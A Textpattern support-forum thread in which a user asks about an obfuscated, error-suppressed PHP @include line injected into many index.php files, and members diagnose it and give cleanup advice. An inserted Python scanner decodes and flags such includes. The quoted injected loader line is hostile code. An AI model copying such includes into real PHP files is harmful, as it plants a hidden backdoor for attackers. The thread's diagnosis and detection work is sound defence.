
Textpattern CMS support forum


#1 2018-04-13 01:01:35

tedweitz
Member
Registered: 2015-03-08
Posts: 19

malware in the code

I have a real issue with migrating my site to a new host

Dreamhost tells me that many php files have this code line that is a malware including textpattern/txp_img/index.php

<?php
/*0d017*/

@include "\x2fhom\x65/te\x64wei\x74z/t\x65dwe\x69tz.\x63om/\x4dyPi\x63tur\x65s/b\x64/im\x61ges\x2ffav\x69con\x5f398\x667a.\x69co";

/*0d017*/

Or textpattern/theme/index.php

<?php
/*6a2bd*/

@include "\x2fhome\x2ftedw\x65itz/\x74edwe\x69tz.c\x6fm/My\x50ictu\x72es/b\x64/ima\x67es/f\x61vico\x6e_398\x667a.i\x63o";

/*6a2bd*/

Is this @include line a legitimate PHP code or should I remove it from all the files that have it

I have just updated to the newest Textpattern

textpattern directories with such files are

textpattern/lib/index.php
textpattern/theme/index.php
textpattern/lpublish/index.php
textpattern/lang/index.php
textpattern/include/index.php
textpattern/txp_img/index.php
textpattern/temp/index.php
files/index.php
rpc/index.php

Thanks so much Sorry for these issues

Ted

Can I remove any of these directories where these files appear to be the only file?

EDIT: Textile —uli

Last edited by uli (2018-04-13 10:04:20)

Offline

#2 2018-04-13 03:24:01

kuopassa
Plugin Author
From: Porvoo, Finland
Registered: 2008-12-03
Posts: 241
Website

Re: malware in the code

The part that is <?php is quite normal and mustn’t be removed in PHP files.

Lines that are like /*0d017*/ are comments and they should be harmless.

Lines that begin with (at)include try to silently load some file. In your code example those scrambled lines with include command can/should be deleted. They in my understanding try to load an icon file from directory /MyPictures/bd/images/favicon_398f7a.ico.

Offline
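
The decoding described in the reply above can be done mechanically. This is an added example, not code from the thread or from Textpattern: a Python script that expands PHP `\xHH` and octal string escapes in include/require literals and reports the resolved path. The function names and the flagging rules are assumptions made for illustration; the infected sample is the snippet quoted in the first post.

```python
import re

# PHP double-quoted strings expand \xHH (1-2 hex digits) and \OOO (1-3 octal digits).
_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# include/require, optionally error-suppressed with @, followed by a double-quoted literal.
_INCLUDE = re.compile(
    r'(@?)\s*\b(include|require)(?:_once)?\b\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I)
# Marker comments such as /*0d017*/ that bracket the injected line.
_MARKER = re.compile(r'/\*([0-9a-f]{5})\*/')

def decode_php_escapes(literal):
    """Expand hex and octal escapes the way PHP does inside double quotes."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return _ESCAPE.sub(repl, literal)

def scan_php_source(source):
    """Return one finding per include whose path is escaped or is not a PHP file."""
    findings = []
    markers = _MARKER.findall(source)
    for m in _INCLUDE.finditer(source):
        raw = m.group(3)
        target = decode_php_escapes(raw)
        reasons = []
        if _ESCAPE.search(raw):
            reasons.append("escaped path")
        if not target.lower().endswith((".php", ".inc")):
            reasons.append("non-PHP target")
        if m.group(1):
            reasons.append("errors suppressed")
        if len(set(markers)) < len(markers):  # same marker seen twice
            reasons.append("paired marker comment")
        if "escaped path" in reasons or "non-PHP target" in reasons:
            findings.append({"target": target, "reasons": reasons})
    return findings

# Snippet as quoted in the first post of this thread.
SAMPLE_INFECTED = r'''<?php
/*0d017*/

@include "\x2fhom\x65/te\x64wei\x74z/t\x65dwe\x69tz.\x63om/\x4dyPi\x63tur\x65s/b\x64/im\x61ges\x2ffav\x69con\x5f398\x667a.\x69co";

/*0d017*/
'''
# Constructed clean sample for comparison.
SAMPLE_CLEAN = '<?php\ninclude "lib/constants.php";\n'

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_INFECTED):
        print(finding["target"], finding["reasons"])
```

The decoded target is the first thing to inspect and remove: the `.ico` file it points to is what the injected line actually loads.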

#3 2018-04-13 03:44:17

bici
Member
From: vancouver
Registered: 2004-02-24
Posts: 2,131
Website Mastodon

Re: malware in the code

tedweitz wrote #310974:

I have a real issue with migrating my site to a new host
Dreamhost tells me that many php files have this code line that is a malware including textpattern/txp_img/index.php

there are a few other txp users who use Dreamhost. Perhaps they can provide some insights on your issues.


…. texted postive

Offline

#4 2018-04-13 06:24:33

phiw13
Plugin Author
From: South-Western Japan
Registered: 2004-02-27
Posts: 3,416
Website

Re: malware in the code

@ Ted,

most of the files you list are NOT part of a default Textpattern install (e.g. textpattern/theme/index.php).

Did you move those files from your previous host? (and had you possibly been hacked on that previous host?)

Here is a suggestion:

  • download a fresh package of Textpattern 4.6.2 (from here).
  • On your server, delete everything in the textpattern folder, except your config.php file – download that to your local disc, and check the contents in a text editor.
  • Delete also the RPC folder, have a look inside the files folder and delete the index.php file – it should not exist.

Then upload the freshly downloaded Textpattern 4.6 to your server (do not upload the files and images folders).


Where is that emoji for a solar powered submarine when you need it ?
Sand space – admin theme for Textpattern
phiw13 on Codeberg

Offline

#5 2018-04-13 10:46:00

uli
Moderator
From: Cologne
Registered: 2006-08-15
Posts: 4,315

Re: malware in the code

In addition to phiw13’s instructions: Change each and every password you have created for your website, be it for your client login to Dreamhost, for FTP, email, databases, Textpattern login, etc. Do not use them ever again, nowhere. Create unique new PWs for each of them, i.e. do not use any of them for another purpose. You can create new ones using e.g. the keychain app of your Mac, the longer the safer.


In bad weather I never leave home without wet_plugout, smd_where_used and adi_form_links

Offline

#6 2018-04-18 00:04:46

tedweitz
Member
Registered: 2015-03-08
Posts: 19

Re: malware in the code

Thanks so much guys

That was a long process, somehow that Malware was having a party on my site. It seemed to infect every folder with a bunch of files.

I went in and manually removed each one of these files or lines in my essential files. As my understanding of this environment is very limited it was a long and confusing process. It didn’t help that the Dreamhost’s Malware removal tool and my desktop’s Norton said all files are clean.

I appreciate the help I received on this site tremendously

Somehow I lived through this migration/upgrading/malware removal so my sites are up and alive

Thanks so much!

Ted
tedweitz.com
tedsgallery.com

Offline

#7 2018-04-18 17:25:00

gaekwad
Server grease monkey
From: People's Republic of Cornwall
Registered: 2005-11-19
Posts: 4,370
GitHub

Re: malware in the code

Ah, the wonders of shared hosting!

If you have an offsite archive of your website, it might be interesting to compress it (minus images and legit uploaded files) and upload it to www.virustotal.com – I’ve discovered all manner of obscure weirdness there with inherited sites.

PS: Ted, I think I did some Textpattern stuff for you some years ago – hope you’re keeping well!

Offline
